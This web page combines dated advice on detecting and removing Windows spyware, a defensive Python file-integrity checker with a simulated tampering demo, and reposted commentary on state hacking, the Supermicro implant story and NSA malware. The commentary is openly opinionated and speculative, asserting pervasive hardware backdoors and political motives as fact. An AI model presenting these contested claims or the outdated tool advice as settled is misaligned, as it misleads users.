In all cases of spyware infection, even the most complex, reinstallation from a "healthy" disk image works perfectly well, and for anybody who is a professional in the field (and not a lazy misfit with a CS degree who has no backups and does not know what is installed on his or her computer) it should take less than an hour. I doubt anyone can find a plausible case in which spyware cannot be cleaned by reinstallation, but I encourage you to try and submit such a case in a letter to the editor of Softpanorama.

Most vendors now provide a special partition with the image of the initially installed Windows 7 or Windows 8, as well as the software ordered with the PC, such as Microsoft Office (the factory install image). The manual always has a special chapter about restoring the image, with a description understandable by everybody with an average IQ ;-). If things are too bad, you can always call the vendor; they are quite helpful.

For those who assemble computers themselves the same idea works as well: they should be able to create an additional partition and an "initial image" using the free version of Acronis True Image (for Seagate and Western Digital drives) or any similar utility.

Signs that you are infected

Not all spyware produces signs that you are infected. For obvious reasons, banking Trojans do not.

But many other types of spyware do produce signs. If you are seeing new toolbars in your browser, excessive popups, or your homepage has been switched, or, more commonly, the PC became very slow or periodically reboots itself or crashes, chances are that you are infected. Other typical symptoms:

  • changed search results
  • changed advertisements on the pages you browse
  • IE periodically crashes
  • computer freezes and the keyboard becomes unresponsive
  • loss of Internet connectivity

Prominent groups of spyware

There are several prominent groups of spyware:

Scanner based methods of detecting spyware

Free AV scanner such a Microsoft security essentials is a useful first layer of defense. It is easily breached and can't be relied upon but  nevertheless it is unreasonable not to use a free scanning software for detection. See  Spyware Scanners. This is important as not all spyware has obvious signs and reveals itself in changing the behavior of the computer of IE or both. Businesses which want an inexpensive software tool that can be used to clean up a Spyware infection on a one-time basis should use free Microsoft Security Essentials which  Windows compatibility wise is better,  not worse then expensive ( and redundant) solutions from Symantec (junk), McAfee (semi-junk) and other AV vendors. And as for spyware detection they all are at best mediocre. You might be lucky and you might be not but generally it can be three or more months before they will include particular malware that infected your PC into their signature databases.

Microsoft provides free spyware scanner (actually 10 days copy of Microsoft Security essentials)  That I recommend to try first.

If you see some suspicious files detected by free scan or files in " C:\Documents and Settings\dell\Local Settings\Temp\" that you can't delete you can use free service called VirusTotal which allow to submit sample and run it over more then two dozens of AV tools. It produce some useful results and is best of the breed as of 2012.

AV vendors are just overhead caused by flaws in the design of Microsoft Windows. For example, the Microsoft program loader is junk: signing executables is an option (Authenticode), but it is rarely used (with Security set to High, no potentially dangerous content will be run, signed or unsigned). The ability to tell the source of a program in Windows is almost non-existent. System files are scattered in a really messy fashion and the Windows directory is a big mess. The registry is another mess, which provides a tremendous number of ways to launch rogue programs.

In any case, free spyware scanners are simple and yet effective against all but the most complex spyware, and that's why they should be tried first. There are two prominent free spyware scanners (Adaware and Spybot S&D). Spybot S&D usage is discussed in a separate page.

The main problem with spyware scanners is that spyware is repeating the path of file viruses: newer variants are designed with specific mechanisms to avoid detection by the scanners (polymorphic spyware). One early example of this trend was the vx2 spyware (SAHAgent, aka Golden Retriever, ShopAtHome and ShopAtHomeSelect). Another early example was CoolWebSearch, or 'CWS' as many refer to it. With more than a hundred known variants, CWS has surpassed most other spyware in the sophistication of its infection and the difficulty of removal.

In any case, it does not make sense to spend money on a commercial spyware scanner. It is better to buy a USB drive and a good backup tool like Acronis.

Please be aware that you need to check the reputation of a product before downloading it. Some spyware masks itself as an AV product and is installed on your PC without your permission. After that it produces fake reports about multiple infections found, to scare you into registering the product. An early example of this trend was Antivirus System Pro. A more recent example is XP Antivirus 2012. Such a product is essentially an extortion scheme designed to exploit the fear of infection for financial gain.

Non-scanner-based Detection Strategies

While analyzing network traffic is the best way to detect spyware, the non-scanner-based strategies for fighting spyware include several additional lines of defense:

  1. HijackThis and similar tools, which can provide a useful baseline that includes an integrated list of relevant registry entries and a process map. Currently I do not know how to run it in batch mode (other than via Expect), but it is still the simplest way to manually create a useful baseline. If you are reading this page and do not yet have a problem, please create at least a process baseline. It might turn out to be extremely helpful in the future. You cannot overestimate the value of the baseline in fighting complex spyware beasts.
     
  2. Integrity checkers that provide a snapshot of critical directories on your C-drive after each reboot. There are several such directories, such as C:\windows, C:\Windows\System32, etc.
  3. Using an Internet proxy. Those who have Linux skills can use the Squid proxy.
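One way to implement the integrity-checker idea from item 2 (and the "create a baseline now, while you are clean" advice from item 1), as an added example rather than a Softpanorama tool: it records size and SHA-256 for every file under the watched directories, stores the baseline as JSON, and on a later run reports added, removed and modified files. The Windows paths in WATCHED_DIRS are the ones the page names; the demo directory, file names and tampering are constructed.

```python
"""Integrity checker: baseline critical directories, diff after each reboot."""
import hashlib
import json
import os
import tempfile
from typing import Dict, List, Tuple

# Directories named on the page; adjust to what you want to watch.
WATCHED_DIRS = [r"C:\Windows", r"C:\Windows\System32"]

Snapshot = Dict[str, Tuple[int, str]]  # full path -> (size, sha256 hex)


def hash_file(path: str, chunk_size: int = 1 << 20) -> str:
    """SHA-256 of a file, read in chunks so big binaries don't exhaust RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(dirs: List[str]) -> Snapshot:
    """Record size and hash of every regular file under the given trees.
    A file that cannot be read (locked, ACL-protected) is recorded with an
    'unreadable' marker instead of aborting the whole run."""
    result: Snapshot = {}
    for top in dirs:
        for root, _subdirs, names in os.walk(top):
            for name in names:
                full = os.path.join(root, name)
                if os.path.islink(full):
                    continue
                try:
                    result[full] = (os.path.getsize(full), hash_file(full))
                except OSError:
                    result[full] = (-1, "unreadable")
    return result


def diff_snapshots(old: Snapshot, new: Snapshot) -> Dict[str, List[str]]:
    """Sorted lists of paths that were added, removed or changed content."""
    old_keys, new_keys = set(old), set(new)
    return {
        "added": sorted(new_keys - old_keys),
        "removed": sorted(old_keys - new_keys),
        "modified": sorted(p for p in old_keys & new_keys if old[p] != new[p]),
    }


def save_snapshot(snap: Snapshot, path: str) -> None:
    """Persist the baseline; keep the copy somewhere the PC cannot alter it."""
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(snap, fh, indent=1)


def load_snapshot(path: str) -> Snapshot:
    """JSON turns tuples into lists; restore them for exact comparison."""
    with open(path, encoding="utf-8") as fh:
        return {k: (v[0], v[1]) for k, v in json.load(fh).items()}


def demo() -> Dict[str, List[str]]:
    """Constructed scenario in a temp folder (not a real System32): take a
    baseline, tamper three ways, and return the diff with paths made relative."""
    with tempfile.TemporaryDirectory() as tmp:
        sysdir = os.path.join(tmp, "System32")
        os.makedirs(sysdir)
        files = {"kernel32.dll": b"A" * 4096, "hosts": b"127.0.0.1 localhost\n"}
        for name, data in files.items():
            with open(os.path.join(sysdir, name), "wb") as fh:
                fh.write(data)
        baseline = os.path.join(tmp, "baseline.json")
        save_snapshot(snapshot([sysdir]), baseline)

        # 1. hosts-file hijack (size changes), 2. new DLL dropped,
        # 3. one byte patched in place: same size, only the hash reveals it.
        with open(os.path.join(sysdir, "hosts"), "ab") as fh:
            fh.write(b"0.0.0.0 update.example\n")
        with open(os.path.join(sysdir, "evil.dll"), "wb") as fh:
            fh.write(b"B" * 10)
        with open(os.path.join(sysdir, "kernel32.dll"), "r+b") as fh:
            fh.seek(100)
            fh.write(b"C")

        report = diff_snapshots(load_snapshot(baseline), snapshot([sysdir]))
        return {k: [os.path.relpath(p, sysdir) for p in v]
                for k, v in report.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Take the baseline from a known-clean state (ideally right after restoring the C-drive image), store the JSON off the machine, and diff after each reboot; 'unreadable' entries and unexpected changes under System32 are what to investigate, after filtering out legitimate Windows updates.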


NEWS CONTENTS

Old News ;-)

[Oct 11, 2018] Insidious propaganda attack on Taiwan manufacturers by Western MSM

Oct 11, 2018 | thenewkremlinstooge.wordpress.com

et Al October 5, 2018 at 4:00 am

The Register: Decoding the Chinese Super Micro super spy-chip super-scandal: What do we know – and who is telling the truth?
https://www.theregister.co.uk/2018/10/04/supermicro_bloomberg/

Who's your money on? Bloomberg's sources? Apple? Amazon? Super Micro?

####

Hit the comments. Quite a few very good points made, namely 'Why now?' (its da Chinese!) as it supposedly occurred some years ago, the US breaks this kind of story when it knows it will shortly be fingered for doing the same (the US did a demo SCADA attack for the media before the STUXNET story broke), if it was done it would have only been on select machines etc. etc.

Euractiv: Apple, Amazon deny Bloomberg report on Chinese hardware attack
https://www.euractiv.com/section/cybersecurity/news/apple-amazon-deny-bloomberg-report-on-chinese-hardware-attack/

There was a headline (which of course I cannot find now*) saying that the US is calling on the UK, EU & Japan to get together and take on China economically. Why does the mighty US need help? It's quite an admission. This is at the same time that the US is targeting EU companies that do business with Russia and also telling Brussels that they do not agree with its very modest proposals for WTO reform.** There's no balance. They're all over the place, not to mention their spokespersons going tonto and shooting off their mouths so casually (US NATO Amb).

The more you look at all the current revelations, who they are made by, the way they are all being fed to the press and the demands now being made, it looks more and more that the Euro-Atlanticists are making another concerted and desperate campaign to retain some sort of influence. The UK is leaving the EU. Even if it rejoins, it won't be a 'special partner'. The fact that the USA-insane Netherlands and the UK are running their stories together shows us that the target is the rest of Europe, just as outgoing Pres of the EU J-C Juncker has said that Europe's best interests are with a security treaty with Russia. BTW, Finland's Stubb is putting himself forward to replace Juncker.

* et voila! US, EU should 'clean the house' and deal with China – US ambassador
https://www.euractiv.com/section/eu-china/news/us-eu-should-clean-the-house-and-deal-with-china-us-ambassador/

** US says it cannot support some of EU's ideas for WTO reform
https://www.euractiv.com/section/economy-jobs/news/us-says-it-cannot-support-some-of-eus-ideas-for-wto-reform/

[Oct 08, 2018] Hacking and Propaganda by Marcus Ranum

Highly recommended!
Notable quotes:
"... There has been an ongoing campaign on the part of the US, to get out the idea that China, Russia, North Korea, and Iran have massive armies of hackers that are constantly looking to steal American secrets. The absurdity of the US' claims is pretty obvious. As I pointed out in my book The Myth of Homeland Security ..."
"... "The Great US/China Cyberwar of 2010" is one cyberwar that didn't happen, but was presaged with a run-up of lots of claims that the Chinese were hacking all over the place. I'm perfectly willing to accept the possibility that there was Chinese hacking activity, but in the industry there was no indication of an additional level of attack or significance. ..."
"... One thing that did ..."
"... US ideology is that "we don't start wars" -- it's always looking for an excuse to go to war under the rubric of self-defense, so I see these sorts of claims as justification in advance for unilateral action. I also see it as a sign of weakness; if the US were truly the superpower it claims it is, it would simply accept its imperial mantle and stop bothering to try to justify anything. I'm afraid we may be getting close to that point. ..."
"... My assumption has always been that the US is projecting its own actions on other nations. At the time when the US was talking the loudest about Chinese cyberwar, the US and Israel had launched STUXNET against the Iranian enrichment plant at Natanz, and the breeder reactor at Bushehr (which happens to be just outside of a large city; the attack took some of its control systems and backup generators offline). Attacks on nuclear power facilities are a war crime under international humanitarian law, which framework the US is signatory to but has not committed to actually follow. This sort of activity happens at the same time that the US distributes talking-points to the media about the danger of Russian hackers crashing the US power grid. I don't think we can psychoanalyze an entire government and I think psychoanalysis is mostly nonsense -- but it's tempting to accuse the US of "projection." ..."
"... All of this stuff happens against the backdrop of Klein, Binney, Snowden, and the Vault 7 revelations, as well as solid attribution identifying the NSA as "equation group" and linking the code-tree of NSA-developed malware to STUXNET, FLAME, and DUQU. ..."
"... the US has even admitted to deploying STUXNET -- Obama bragged about it. When Snowden's revelations outlined how the NSA had eavesdropped on Angela Merkel's cellphone, the Germans expressed shock and Barack Obama remarkably truthfully said "that's how these things are done" and blew the whole thing off by saying that the NSA wasn't eavesdropping on Merkel any more. [ bbc ] ..."
"... It's hard to keep score because everything is pretty vague, but it sounds like the US has been dramatically out-spending and out-acting the other nations that it accuses of being prepared for cyberwar. ..."
"... it's hard not to see the US is prepared for cyberwar, when both the NSA and the CIA leak massive collections of advanced tools. ..."
"... My observation is that the NSA and CIA have been horribly sloppy and have clearly spent a gigantic amount of money preparing to compromise both foreign and domestic systems -- that's bad enough. With friends like the NSA and CIA, who needs Russians and Chinese? ..."
"... The Russian and Chinese efforts are relatively tiny compared to the massive efforts the US expends tens of billions of dollars on. The US spends about $50bn on its intelligence agencies, while the entire Russian Department of Defense budget is about $90bn (China is around $139bn) -- maybe the Russians and Chinese have such a small footprint because they are much smaller operations? ..."
"... That brings us to the recent kerfuffle about taps on the Supermicro motherboards. That's not unbelievable at all -- not in a world where we discover that Intel has built a parallel management CPU into every CPU since 2008, and that there is solid indications that other processors have similar backdoors. ..."
"... There are probably so many backdoors in our systems that it's a miracle it works at all. ..."
"... So, with respect to "propaganda" I would say that the US intelligence community has been consistently pushing a propaganda agenda against the US government, and the citizens in order to justify its actions and defend its budget. ..."
"... What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes. ..."
"... Funny how those obsessed with "false flag" operations work so hard to invite more of same. ..."
Oct 07, 2018 | freethoughtblogs.com

Bob Moore asks me to comment on an article about propaganda and security/intelligence. [ article ] This is going to be a mixture of opinion and references to facts; I'll try to be clear which is which.

Yesterday several NATO countries ran a concerted propaganda campaign against Russia. The context for it was a NATO summit in which the U.S. presses for an intensified cyberwar against NATO's preferred enemy.

On the same day another coordinated campaign targeted China. It is aimed against China's development of computer chip manufacturing further up the value chain. Related to this is U.S. pressure on Taiwan, a leading chip manufacturer, to cut its ties with its big motherland.

It is true that the US periodically makes a big push regarding "messaging" about hacking. Whether or not it constitutes a "propaganda campaign" depends on how we choose to interpret things and the labels we attach to them -- "propaganda campaign" has a lot of negative connotations and one person's "outreach effort" is another's "propaganda." An ultra-nationalist or an authoritarian submissive who takes the government's word for anything would call it "outreach."

There has been an ongoing campaign on the part of the US, to get out the idea that China, Russia, North Korea, and Iran have massive armies of hackers that are constantly looking to steal American secrets. The absurdity of the US' claims is pretty obvious. As I pointed out in my book The Myth of Homeland Security (2004) [ wc ] claims such as that the Chinese had "40,000 highly trained hackers" are flat-out absurd and ignore the reality of hacking; that's four army corps. Hackers don't engage in "human wave" attacks.

"The Great US/China Cyberwar of 2010" is one cyberwar that didn't happen, but was presaged with a run-up of lots of claims that the Chinese were hacking all over the place. I'm perfectly willing to accept the possibility that there was Chinese hacking activity, but in the industry there was no indication of an additional level of attack or significance.

One thing that did happen in 2010 around the same time as the nonexistent cyberwar was China and Russia proposed trilateral talks with the US to attempt to define appropriate limits on state-sponsored hacking. The US flatly rejected the proposal, but there was virtually no coverage of that in the US media at the time. The UN also called for a cyberwar treaty framework, and the effort was killed by the US. [ wired ] What's fascinating and incomprehensible to me is that, whenever the US feels that its ability to claim pre-emptive cyberwar is challenged, it responds with a wave of claims about Chinese (or Russian or North Korean) cyberwar aggression.

John Negroponte, former director of US intelligence, said intelligence agencies in the major powers would be the first to "express reservations" about such an accord.

US ideology is that "we don't start wars" -- it's always looking for an excuse to go to war under the rubric of self-defense, so I see these sorts of claims as justification in advance for unilateral action. I also see it as a sign of weakness; if the US were truly the superpower it claims it is, it would simply accept its imperial mantle and stop bothering to try to justify anything. I'm afraid we may be getting close to that point.

My assumption has always been that the US is projecting its own actions on other nations. At the time when the US was talking the loudest about Chinese cyberwar, the US and Israel had launched STUXNET against the Iranian enrichment plant at Natanz, and the breeder reactor at Bushehr (which happens to be just outside of a large city; the attack took some of its control systems and backup generators offline). Attacks on nuclear power facilities are a war crime under international humanitarian law, which framework the US is signatory to but has not committed to actually follow. This sort of activity happens at the same time that the US distributes talking-points to the media about the danger of Russian hackers crashing the US power grid. I don't think we can psychoanalyze an entire government and I think psychoanalysis is mostly nonsense -- but it's tempting to accuse the US of "projection."

The anti-Russian campaign is about alleged Russian spying, hacking and influence operations. Britain and the Netherland took the lead. Britain accused Russia's military intelligence service (GRU) of spying attempts against the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague and Switzerland, of spying attempts against the British Foreign Office, of influence campaigns related to European and the U.S. elections, and of hacking the international doping agency WADA. British media willingly helped to exaggerate the claims: [ ]

The Netherland [sic] for its part released a flurry of information about the alleged spying attempts against the OPCW in The Hague. It claims that four GRU agents traveled to The Hague on official Russian diplomatic passports to sniff out the WiFi network of the OPCW. (WiFi networks are notoriously easy to hack. If the OPCW is indeed using such it should not be trusted with any security relevant issues.) The Russian officials were allegedly very secretive, even cleaning out their own hotel trash, while they, at the same time, carried laptops with private data and even taxi receipts showing their travel from a GRU headquarter in Moscow to the airport. Like in the Skripal/Novichok saga the Russian spies are, at the same time, portrayed as supervillains and hapless amateurs. Real spies are neither.

The U.S. Justice Department added to the onslaught by issuing new indictments (pdf) against alleged GRU agents dubiously connected to several alleged hacking incidents . As none of those Russians will ever stand in front of a U.S. court the broad allegations will never be tested.

There's a lot there, and I think the interpretation is a bit over-wrought, but it's mostly accurate. The US and the UK (and other NATO allies, as necessary) clearly coordinate when it comes to talking points. Claims of Chinese cyberwar in the US press will be followed by claims in the UK and Australian press, as well. My suspicion is that this is not the US Government and UK Government coordinating a story -- it's the intelligence agencies doing it. My opinion is that the intelligence services are fairly close to a "deep state" -- the CIA and NSA are completely out of control and the CIA has gone far toward building its own military, while the NSA has implemented completely unrestricted surveillance worldwide.

All of this stuff happens against the backdrop of Klein, Binney, Snowden, and the Vault 7 revelations, as well as solid attribution identifying the NSA as "equation group" and linking the code-tree of NSA-developed malware to STUXNET, FLAME, and DUQU. While the attribution that "Fancy Bear is the GRU" has been made and is probably fairly solid, the attribution of NSA malware and CIA malware is rock solid; the US has even admitted to deploying STUXNET -- Obama bragged about it. When Snowden's revelations outlined how the NSA had eavesdropped on Angela Merkel's cellphone, the Germans expressed shock and Barack Obama remarkably truthfully said "that's how these things are done" and blew the whole thing off by saying that the NSA wasn't eavesdropping on Merkel any more. [ bbc ]

It's hard to keep score because everything is pretty vague, but it sounds like the US has been dramatically out-spending and out-acting the other nations that it accuses of being prepared for cyberwar. I tend to be extremely skeptical of US claims because: bomber gap, missile gap, gulf of Tonkin, Iraq WMD, Afghanistan, Libya and every other aggressive attack by the US which was blamed on its target. The reason I assume the US is the most aggressive actor in cyberspace is because the US has done a terrible job of protecting its tool-sets and operational security: it's hard not to see the US is prepared for cyberwar, when both the NSA and the CIA leak massive collections of advanced tools.

Meanwhile, where are the leaks of Russian and Chinese tools? They have been few and far between, if there have been any at all. Does this mean that the Russians and Chinese have amazingly superior tradecraft, if not tools? I don't know. My observation is that the NSA and CIA have been horribly sloppy and have clearly spent a gigantic amount of money preparing to compromise both foreign and domestic systems -- that's bad enough. With friends like the NSA and CIA, who needs Russians and Chinese?

The article does not have great depth to its understanding of the situation, I'm afraid. So it comes off as a bit heavy on the recent news while ignoring the long-term trends. For example:

The allegations of Chinese supply chain attacks are of course just as hypocritical as the allegations against Russia. The very first known case of computer related supply chain manipulation goes back to 1982:

A CIA operation to sabotage Soviet industry by duping Moscow into stealing booby-trapped software was spectacularly successful when it triggered a huge explosion in a Siberian gas pipeline, it emerged yesterday.

I wrote a piece about the "Farewell Dossier" in 2004. [ mjr ] Re-reading it, it comes off as skeptical but waffly. I think that it's self-promotion by the CIA and exaggerates considerably ("look how clever we are!") at a time when the CIA was suffering an attention and credibility deficit after its shitshow performance under George Tenet. But the first known cases of computer related supply chain manipulation go back to the 70s and 80s -- the NSA even compromised Crypto AG's Hagelin M-209 system (a mechanical ciphering machine) in order to read global communications encrypted with that product. You can imagine Crypto AG's surprise when the Iranian secret police arrested one of their sales reps for selling backdoor'd crypto -- the NSA had never told them about the backdoor, naturally. The CIA was also on record for producing Xerox machines destined for the USSR, which had recorders built into them. So, while the article is portraying the historical sweep of NSA dirty tricks, they're only looking at the recent ones. Remember: the NSA also weakened the elliptic curve crypto library in RSA's Bsafe implementation, paying RSADSI $13 million to accept their tweaked code.

Why haven't we been hearing about the Chinese and Russians doing that sort of thing? There are four options:

  1. The Russians and Chinese are doing it, they're just so darned good nobody has caught them until just recently.
  2. The Russians and Chinese simply resort to using existing tools developed by the hacking/cybercrime community and rely on great operational security rather than fancy tools.
  3. The Russian and Chinese efforts are relatively tiny compared to the massive efforts the US expends tens of billions of dollars on. The US spends about $50bn on its intelligence agencies, while the entire Russian Department of Defense budget is about $90bn (China is around $139bn) -- maybe the Russians and Chinese have such a small footprint because they are much smaller operations?
  4. Something else.

That brings us to the recent kerfuffle about taps on the Supermicro motherboards. That's not unbelievable at all -- not in a world where we discover that Intel has built a parallel management CPU into every CPU since 2008, and that there is solid indications that other processors have similar backdoors.

Was the Intel IME a "backdoor" or just "a bad idea"? Well, that's tricky. Let me put my tinfoil hat on: making a backdoor look like a sloppily developed product feature would be the competent way to write a backdoor. Making it as sneaky as the backdoor in the Via is unnecessary -- incompetence is eminently believable.


I believe all of these stories (including the Supermicro) are the tip of a great big, ugly iceberg. The intelligence community has long known that software-only solutions are too mutable, and are easy to decompile and figure out. They have wanted to be in the BIOS of systems -- on the motherboard -- for a long time. If you go back to 2014, we have disclosures about the NSA malware that hides in hard drive BIOS: [ vice ] [ vice ] That appears to have been in progress around 2000/2001.

Of note, the group recovered two modules belonging to EquationDrug and GrayFish that were used to reprogram hard drives to give the attackers persistent control over a target machine. These modules can target practically every hard drive manufacturer and brand on the market, including Seagate, Western Digital, Samsung, Toshiba, Corsair, Hitachi and more. Such attacks have traditionally been difficult to pull off, given the risk in modifying hard drive software, which may explain why Kaspersky could only identify a handful of very specific targets against which the attack was used, where the risk was worth the reward.

But Equation Group's malware platforms have other tricks, too. GrayFish, for example, also has the ability to install itself into computer's boot record -- software that loads even before the operating system itself -- and stores all of its data inside a portion of the operating system called the registry, where configuration data is normally stored.

EquationDrug was designed for use on older Windows operating systems, and "some of the plugins were designed originally for use on Windows 95/98/ME" -- versions of Windows so old that they offer a good indication of the Equation Group's age.

This is not a very good example of how to establish a "malware gap" since it just makes the NSA look like they are incapable of keeping a secret. If you want an idea how bad it is, Kaspersky labs' analysis of the NSA's toolchain is a good example of how to do attribution correctly. Unfortunately for the US agenda, that solid attribution points toward Fort Meade in Maryland. [kaspersky]

Let me be clear: I think we are fucked every which way from the start. With backdoors in the BIOS, backdoors on the CPU, and wireless cellular-spectrum backdoors, there are probably backdoors in the GPUs and the physical network controllers, as well. Maybe the backdoors in the GPU come from the GRU and maybe the backdoors in the hard drives come from NSA, but who cares? The upshot is that all of our systems are so heinously compromised that they can only be considered marginally reliable. It is, literally, not your computer: it's theirs. They'll let you use it so long as your information is interesting to them.

Do I believe the Chinese are capable of doing such a thing? Of course. Is the GRU? Probably. Mossad? Sure. NSA? Well-documented attribution points toward NSA. Your computer is a free-fire zone. It has been since the mid 1990s, when the NSA was told "no" on the Clipper chip and decided to come up with its own Plan B, C, D, and E. Then, the CIA came up with theirs. Etc. There are probably so many backdoors in our systems that it's a miracle it works at all.

From my 2012 RSA conference lecture "Cyberwar, you're doing it wrong."

The problem is that playing in this space is the purview of governments. Nobody in the cybercrime or hacking world needs tools like these. The intelligence operatives have huge budgets, compared to a typical company's security budget, and it's unreasonable to expect any business to invest such a level of effort on defending itself. So what should companies do? They should do exactly what they are doing: expect the government to deal with it; that's what governments are for. The problem with that strategy is that their government isn't on their side, either! It's Hobbes' playground.

In case you think I am engaging in hyperbole, I assure you I am not. If you want another example of the lengths (and willingness to bypass the law) "they" are willing to go, consider 'stingrays' that are in operation in every major US city and outside of every interesting hotel and high tech park. Those devices are not passive -- they actively inject themselves into the call set-up between your phone and your carrier -- your data goes through the stingray, or it doesn't go at all. If there are multiple stingrays, then your latency goes through the roof. "They" don't care. Are the stingrays NSA, FBI, CIA, Mossad, GRU, or PLA? Probably a bit of all of the above depending on where and when.

Whenever the US gets caught with its pants down around its ankles, it blames the Chinese or the Russians because they have done a good job of building the idea that the most serious hackers on the planet are the Chinese. I don't believe that we're seeing complex propaganda campaigns that are tied to specific incidents -- I think we see ongoing organic propaganda campaigns that all serve the same end: protect the agencies, protect their budgets, justify their existence, and downplay their incompetence.

So, with respect to "propaganda" I would say that the US intelligence community has been consistently pushing a propaganda agenda against the US government, and the citizens in order to justify its actions and defend its budget.

The government also engages in propaganda, and is influenced by the intelligence community's propaganda as well. And the propaganda campaigns work because everyone involved assumes, "well, given what the NSA has been able to do, I should assume the Chinese can do likewise." That's a perfectly reasonable assumption and I think it's probably true that the Chinese have capabilities. The situation is what Chuck Spinney calls "A self-licking ice cream cone" -- it's a justifying structure that makes participation in endless aggression seem like a sensible thing to do. And, when there's inevitably a disaster, it's going to be like a cyber-9/11 and will serve as a justification for even more unrestrained aggression.


Want to see what it looks like? A thousand thanks to Commentariat member [redacted] for this link. If you don't like video, there's an article here. [ toms ]

https://www.youtube.com/embed/_eSAF_qT_FY

Is this an NSA backdoor, or normal incompetence? Is Intel Management Engine an NSA-inspired backdoor, or did some system engineers at Intel think that was a good idea? There are other scary indications of embedded compromise: the CIA's Vault7 archive included code that appeared to be intended to embed in the firmware of "smart" flatscreen TVs. That would make every LG flat panel in every hotel room a listening device just waiting to be turned on.

We know the Chinese didn't do that particular bug but why wouldn't they do something similar, in something else? China is the world's oldest mature culture -- they literally wrote the book on strategy -- Americans acting as though it's a great surprise to learn that the Chinese are not stupid, it's just the parochialism of a 250 year-old culture looking at a 3,000 year-old culture and saying "wow, you guys haven't been asleep at the switch after all!"

WIRED on cyberspace treaties [ wired ]

Comments
  1. Pierce R. Butler says

    October 6, 2018 at 1:31 pm

    What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes.

    Funny how those obsessed with "false flag" operations work so hard to invite more of same.

  2. Marcus Ranum says

    October 6, 2018 at 2:28 pm

    Pierce R. Butler@#1:
    What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes.

    Yes. Since 2001, as far as most of us can tell, federal cybersecurity spend has been 80% offense, 20% defense. And a lot of the offensive spend has been aimed at We, The People.

  3. Cat Mara says

    October 6, 2018 at 5:20 pm

    Your mention of Operation Sundevil and Kevin Mitnick in a previous post made me think that maybe the reason we haven't seen the kind of leaks from the Russian and Chinese hacking operations that we've seen from the NSA is that they're running a "Kevin Mitnick style" operation; that is, relying less on technical solutions and using instead old-fashioned "social engineering" and other low-tech forms of espionage (like running troll farms on social media). I mean, I've seen interviews with retired US intelligence people since the 90s complain that since the late 1980s, the intelligence agencies have been crippled by management in love with hi-tech "SIGINT" solutions to problems that never deliver and neglecting old-fashioned "HUMINT" intelligence-gathering.

    The thing is, Kevin Mitnick got away with a lot of what he did because people didn't take security seriously then, and still don't. On a similar nostalgia vibe, I remember reading an article by Keith Bostic (one of the researchers who helped in the analysis of the Morris worm that took down a significant chunk of the Internet back in 1988) where he did a follow-up a year or so afterwards and some depressing number of organisations that had been hit by it still hadn't patched the holes that had let the worm infect them in the first place.

  4. Marcus Ranum says

    October 6, 2018 at 9:20 pm

    Cat Mara@#3:
    Your mention of Operation Sundevil and Kevin Mitnick in a previous post made me think that maybe the reason we haven't seen the kind of leaks from the Russian and Chinese hacking operations that we've seen from the NSA is that they're running a "Kevin Mitnick style" operation; that is, relying less on technical solutions and using instead old-fashioned "social engineering" and other low-tech forms of espionage (like running troll farms on social media).

    I think that's right, to a high degree. What if Edward Snowden was an agent provocateur instead of a well-meaning naive kid? A tremendous amount of damage could be done, as well as stealing the US' expensive toys. The Russians have been very good at doing exactly that sort of operation, since WWII. The Chinese are, if anything, more subtle than the Russians.

    The Chinese attitude, as expressed to me by someone who might be a credible source is, "why are you picking a fight with us? We don't care, you're too far away for us to threaten you, we both have loads of our own fish to fry." To them, the US is young, hyperactive, and stupid.

    The FBI is not competent, at all, against old-school humint intelligence-gathering. Compared to the US' cyber-toys, the old ways are probably more efficient and cost effective. China's intelligence community is also much more team-oriented than the CIA/NSA; they're actually a disciplined operation under the strategic control of policy-makers. That, by the way, is why Russians and Chinese stare in amazement when Americans ask things like "Do you think Putin knew about this?" What a stupid question! It's an autocracy; they don't have intelligence operatives just going and deciding "it's a nice day to go to England with some Novichok." The entire American attitude toward espionage lacks maturity.

    On a similar nostalgia vibe, I remember reading an article by Keith Bostic (one of the researchers who helped in the analysis of the Morris worm that took down a significant chunk of the Internet back in 1988) where he did a follow-up a year or so afterwards and some depressing number of organisations that had been hit by it still hadn't patched the holes that had let the worm infect them in the first place.

    That was an exciting time. We were downstream from University of Maryland, which got hit pretty badly. Pete Cottrel and Chris Torek from UMD were also in on Bostic's dissection. We were doing uucp over TCP for our email (that changed pretty soon after the worm) and our uucp queue blew up. I cured the worm with a reboot into single-user mode and a quick 'rm -f' in the uucp queue.

  5. Bob Moore says

    October 7, 2018 at 9:18 am

    Thanks. I appreciate your measured analysis and the making explicit of the bottom line: "agencies, protect their budgets, justify their existence, and downplay their incompetence."

[Oct 05, 2018] The SuperMicro chips problem may be an alleged use of the Intel Management Engine (or the AMD equivalent).

Oct 05, 2018 | www.moonofalabama.org

daffyDuct , Oct 5, 2018 8:35:21 PM | link

The SuperMicro chips may be an alleged use of the Intel Management Engine (or the AMD equivalent).

From Bloomberg: https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies

"In simplified terms, the implants on Supermicro hardware manipulated the core operating instructions that tell the server what to do as data move across a motherboard, two people familiar with the chips' operation say. This happened at a crucial moment, as small bits of the operating system were being stored in the board's temporary memory en route to the server's central processor, the CPU. The implant was placed on the board in a way that allowed it to effectively edit this information queue, injecting its own code or altering the order of the instructions the CPU was meant to follow. Deviously small changes could create disastrous effects.

The illicit chips could do all this because they were connected to the baseboard management controller, a kind of superchip that administrators use to remotely log in to problematic servers, giving them access to the most sensitive code even on machines that have crashed or are turned off."

From Wikipedia: https://en.wikipedia.org/wiki/Intel_Management_Engine

